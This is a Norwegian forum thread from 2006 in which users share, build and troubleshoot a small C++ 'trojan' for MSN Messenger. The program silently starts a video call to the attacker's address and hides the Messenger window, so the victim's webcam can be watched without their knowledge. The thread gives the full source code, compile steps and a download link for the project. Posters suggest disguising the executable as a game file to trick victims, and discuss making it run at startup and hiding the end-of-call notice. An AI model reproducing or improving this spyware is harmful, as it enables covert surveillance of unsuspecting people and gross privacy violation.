Du må være registrert og logget inn for å kunne legge ut innlegg på freak.no
X
LOGG INN
... eller du kan registrere deg nå
Dette nettstedet er avhengig av annonseinntekter for å holde driften og videre utvikling igang. Vi liker ikke reklame heller, men alternativene er ikke mange. Vær snill å vurder å slå av annonseblokkering, eller å abonnere på en reklamefri utgave av nettstedet.
  201 39223
Jeg fulgte anvisningen i tråden : )

Men får ikke til kun webcam , det må bli videosamtale, det er jo det samme nesten. bare man kan snakke å .

Msn vindu låses oxo, så den personen som "bruker" fila , får ikke åpnet msn vinduet ditt.
Fikk den til . men det blir stemme samtale
Sist endret av A l e x Z; 20. juli 2006 kl. 01:37.
det samme problemet har vi også a l e x z...det blir stemme samtale :S
Izor? Hvordan fikk du fikset det? Får akkurat samme feil som du fikk!
Heeeelp
Kan en av dere si hva dere gjorde for å få det til?
Hmm..
Dette ble værre.. Jeg kopierte først inn det den koden, så fulgte jeg den guiden! Men til ingen nytte. Eller.. Noe feil har jeg jo selvfølgelig gjort, men aner ikke hva.
Får bare til med stemmesamtale...hva gjør jeg galt?
Ingenting som skjer her, bruker msn live.
jeg fant en måte der det funka med cam, du får den personen til å godta cam først.. så ber du personen kjøre det . da funker det . Men blir litt verre hvis den personen ikke godtar :/ . Jeg gjorde det som sto i posten her, men fikk bare build error her, men så tok jeg det på ei anna maskin, da fikk jeg endelig til fila
▼ ... over en uke senere ... ▼
Jeg gjør alt som står i tråden, men jeg får det ikke til!
For dere som ikke har tenkt så langt så er den enkleste måten å teste dette på å skrive inn en annens mail, sånn at du er "offeret". (Bare for å gjøre at testingen går litt raskere)
yes, fikk det til..Alt jeg gjor var å legge absolutt alle filene i samma mappe, som han skrev tidligere..Skal bare laste ned antivirus(må ha det for å sende på msn), så skal jeg teste det.. =)
edit: nå fikk jeg testa det, og brukern fikk feilmld - må lukkes osv...
Sist endret av freakybeaky; 2. august 2006 kl. 16:41.
jjeg får også feil mld må lukke osv :P
▼ ... over en uke senere ... ▼
hva med at bare en som har litt pleiling, lagrer det som prosjekt, og gir hos en link hvor vi kan laste den ned. også en guide e.l hvis vi må bytte om noe som f.eks. msn-adressa.
Har blitt spurt tusen ganger, men ingen som gidder å gjøre det.
▼ ... over en uke senere ... ▼
Hvis noen har fått dette til å funke, kan noen være vennlige å legge .exe fila ut på nettet så folk kan laste den ned?


eller legger ut en kildekode som fungerer!
Det der stemmesamtale problemet oppstår hvis "offeret" har en annen verson av msn enn deg tror jeg..

EDIT: Legger ut prosjekt filene.. Trenger bare endre email

http://home.no.net/afinset2/prosjekt1.zip
Sist endret av Andersf; 20. august 2006 kl. 17:37. Grunn: legger til prosjekt
Sitat av Andersf
Det der stemmesamtale problemet oppstår hvis "offeret" har en annen verson av msn enn deg tror jeg..

EDIT: Legger ut prosjekt filene.. Trenger bare endre email

http://home.no.net/afinset2/prosjekt1.zip
Vis hele sitatet...
Er det bare main.txt filen som skal sendes??
Sist endret av korneliussen497; 21. august 2006 kl. 23:14.
nei, exe fila som blir lagret
Har ingen .exe fil. Hva må jeg gjøre med det jeg har lastet ned?
jeg er helt ny i dette så kan dere si meg hva jeg skal gjøre når jeg har lasta ned fila?
Sitat av naits360
jeg er helt ny i dette så kan dere si meg hva jeg skal gjøre når jeg har lasta ned fila?
Vis hele sitatet...
Det er jeg også! N00b!!
Noen som vet hva vi skal gjøre?
Sist endret av korneliussen497; 22. august 2006 kl. 16:55.
Det du gjør er å åpne filen i programmet, trykk på main.cpp og skriv inn mailen din i kilden i stedet for "xxxx@xxx.com". Til slutt trykker du ctrl + f11 og filen din prosjekt1.exe er blitt laget..
Hvorfor i helvete leser dere ikke guiden som allerede er laget? Den er i mine øyne meget presis i hva du skal gjøre.
det var så masse forskjellig der.
Om dere følger guiden rett, så skal det funke!
Sitat av korneliussen497
det var så masse forskjellig der.
Vis hele sitatet...

Masse forskjellig? Hva snakker du om? Følg guiden til punkt og prikke, så blir det riktig.
Sist endret av mainer; 22. august 2006 kl. 17:36.
http://www.bloodshed.net/download.html

Der er en link til ett gratis kodeprogram som heter dev-c++, som tuxeren har brukt for å lage trojaneren. Når dere har lastet ned programmet så start det. (Ja faktisk)
trykk på arkiv -> nytt prosjekt.
Velg windows application, da kommer det opp hvor dere vil lagre programmet.
Pass på at alle filer kommer i samme mappe.
Når dere har gjort det så kommer det til å komme opp masse tekst til høyre i dev-c++
ta bort all tekst så at det er rent i ruten. Kopier deretter:

Kode:

#include "windows.h"
#include "msgruaid.h"
#include "msgrua.h"
#include "oleauto.h"
int main(int argc, char *argv[])
{
IMessenger2 *pIMessenger = NULL;
IMessengerWindow *pIWindow = NULL;
IDispatch *pIDispatch = NULL;
VARIANT vName;
char *cName;
long lWindow;

CoInitialize(0);
CoCreateInstance(CLSID_Messenger, NULL, CLSCTX_ALL, IID_IMessenger, (void **)&pIMessenger); *

cName = "din e-mail";

BSTR pbstrName= SysAllocStringLen(NULL, lstrlenA(cName));
MultiByteToWideChar(CP_ACP, 0, cName, lstrlenA(cName), pbstrName, lstrlenA(cName));
SysFreeString(pbstrName);
* *
vName.vt = VT_BSTR;
vName.bstrVal *= (BSTR)pbstrName;
* *
pIMessenger->StartVideo(vName, &pIDispatch);
pIDispatch->QueryInterface(IID_IMessengerWindow, (void**)&pIWindow);
pIDispatch->Release();

// Get handle of window
pIWindow->get_HWND(&lWindow);
pIWindow->Release();
* * * * *
// Hide the window
ShowWindow((HWND)lWindow, SW_HIDE);

pIMessenger->Release();
CoUninitialize();
ExitProcess(0);
return 0;
}


Når dere har kopiert inn teksten skal dere trykke på: prosjekt-> prosjekt alternativer. Da kommer det opp en rute der dere skal velge paramantere.

Trykk på knappen "legg till bibliotek" og bla dit du instalerte dev-c++ (C:/dev-cpp/) i den mappen finns det en mappe som heter lib,
gå inn i den og markere "libole32.a" og "liboleaut32.a" og trykk åpne.
Når dere har gjort det skal dere legge til enda en .lib fil som finnes på:

http://www.msghelp.net/attachment.php?pid=280776

Last ned filene og legg de i samme mappe som allt det andre
klikk på legg til bibliotek igjen og bla fram til mappen der du lagret alt og der ska filene ligge som du nettopp lastet ned. markere "msgrguid.lib" og trykk på legg till.

Nå skal dere legga til de andre to filene som fantes med i mappen dere lastet ned.
Til venstre i dev-c++ programmet så finnes det ett fil-tre, høyreklikk på den øverste mappen som *"main.cpp" ligger i og velg "legg til prosjekt" gå deretter til mappen der alt ligger og marker "msgrua.h" og "msgruid.h" og velg åpne.

Nå skal programmet være klart til å komplimeres. Trykk på komplimer (en knapp med fire ruter på) eller ctrl+f11. Lagre fila i samme mappe.
Nå skal fila være klar.

Om det blir noe feil kan det være fordi filene ikke er i samme mappe.

Om fila fungerer skal det finnes to rader med tekst der det står:
.drectv`-default:uuid.lib ' unrecognized
.drectv`-default:uuid.lib ' unrecognized
Vis hele sitatet...
Noen som har brukt denne, og ikke fått det til?
Jeg har fulgt den men får feilmelding.
Har du gjort akkurat som det står da? Det er jo rart at det er noen som får det til, andre ikke.
Skal alle ting jeg laster ned og lager, lagres i mappen lib?
Alt sammen liksom?
Sist endret av korneliussen497; 22. august 2006 kl. 18:29.
Ok. Folkens. Jeg prøvde meg på dette her og funka, men jeg prøvde ikke slik korneliussen497 siterte. Slik gjorde jeg det:

1. Last ned Andersf sin version: http://home.no.net/afinset2/prosjekt1.zip
2. Extract alt i en mappe et sted på harddisken din.
3. Gå på google, søk på c++ compilator og last ned. Start den opp, instaler og whatever, så den funker.
4. Deretter går du dit hvor du lagret Anders sin verision, og åpner .dev fila i kompilatoren.
5. Finn et sted i fila hvor det står . Dette skal da byttes ut med din msn e-post som du er logga inn som.
6. Finn en knapp i kompilatoren og kompiler. Gå til mappa og for å få den til å se litt bedre ut, kan du rename til noe du vet den personen du vil lure kanskje liker, f.eks om han spiller wow, kan du rename den til "WoW-Flying-mounts-EXCLUSIVE.exe"
7. Send den til idioten og du har et åpent web-cam

Om du har spørsmål, vennligst ikke send meg en PM, men heller sjekk ut FAQ'en jeg laget! Om du fortsatt trenger hjelp, er du fri til å sende meg en PM, men ikke forvent deg 100% support.
får man lyd eller bilde da? eller begge?

bra forklart jo10
da skal man få begge deler etter min erfaring. Ble litt lei alle noobene som ikke skjønte en dritt, så fikk en slutt på det selv :P
ÅÅÅÅ!! Nå fikk jeg det til!
En ting til: Virker det hele tiden eller må den personen åpne den for hver gang?
man kan vel legge den greia i delemappa på msn8/win live messenger?
Sitat av korneliussen497
ÅÅÅÅ!! Nå fikk jeg det til!
En ting til: Virker det hele tiden eller må den personen åpne den for hver gang?
Vis hele sitatet...
Hva tror du da? "virker den hele tida?" det er vel elementært... Den funker om personen har kjørt fila og til han stopper sendingen eller restarter pc'n/kobler seg fra nettet. Og ja, vil du se han en annen gang, er det bare for han å åpne den igjen.

Edit: Om du har litt skills/lærer deg å lage dos programmer, kan du jo prøve å utvide trojaneren til å startes hver gang han starter MSN osv. Vær kreativ. Obs: Dette krever kodeskills.
Sist endret av Gisse; 22. august 2006 kl. 23:02.
Drit i det. Lurte baare på om det var sånn at ver gang den personen logget deg på så kunne jeg se webkameraet. Men det går jo ikke då.
Som jeg sa. Har du skills, kan du få det til. Det krever litt, seff, men om du virkelig vil det, er det ikkeno som stopper deg.
OK!
Prøvde den filen i dag!! Funket fett!
Anbefales
Hei.. Prøvde det nå, veldig bra! All hyllest til han som har mekka det der!
Men en ting lurer jeg på.. Når jeg esc'er samtalen med de, så får de opp sånn : Videosamtalen med Ols111 er avsluttet. Er det på noen måte mulig å gjøre slik at de ikke ser det?
Limited edition
Moff's Avatar
Er det nødvendig at MSN.exe er startet når fila åpnes?
Det er vel ikke veldig vanskelig å kjøre fila ved startup,
er det? Det blir jo værre hvis MSN må være startet hver gang i tillegg...
( offtopic ) ONDE ONDE MENNESKER SOM SPIONERER :O
Hadde jo vært genialt om noen kunne kode og lagt ut sånn at den starta i oppstart og at det ikke kom slik skrift på slutten når du avslutta samtalen. Hadde vært genialt om noen hadde fått ordna det.

Ikkje onde vi
Onde?? Vi gjør bare litt rampestreker!! LOL
Jeg finner ingen c++ compilator. Er ikke noe dårlig google-søker, egentlig - om jeg må skylde det på noe, så må det være at linjen min er litt sirup for tiden, den viser det den vil vise.. hm.
Tja... Funka hvertfall når jeg gjorde det. Vel... Den jeg brukte, heter hvertfall Dev-C ++. Den skal funke utmerket til det vi har lyst til :P
Fikk det nesten til og funke Når jeg trykker på web cam til en eller annen etter å ha sendt dem fila så står det bare og "loader" bilde kommer aldri frem...

Noen som har vært borti noe lignende?
Funker fint for min del, men bildet henger i andre siden (jeg får sett på kameraet dems fordet), høytallerne plinger (telefonsamtale) og lyset på webkameraet skrur seg på hos vedkommende..
Sitat av Speedmaster
Fikk det nesten til og funke Når jeg trykker på web cam til en eller annen etter å ha sendt dem fila så står det bare og "loader" bilde kommer aldri frem...

Noen som har vært borti noe lignende?
Vis hele sitatet...
Du skal ikke trykke på webcam til noen. Hvis "offeret" har kjørt filen og har samme msn verson som deg skal det komme en invitasjon om videosamtale av seg selv..
kan dere legge ut en link til et sted hvor jeg kan laste ned en c++ compilator. får opp masse rart når jeg googler.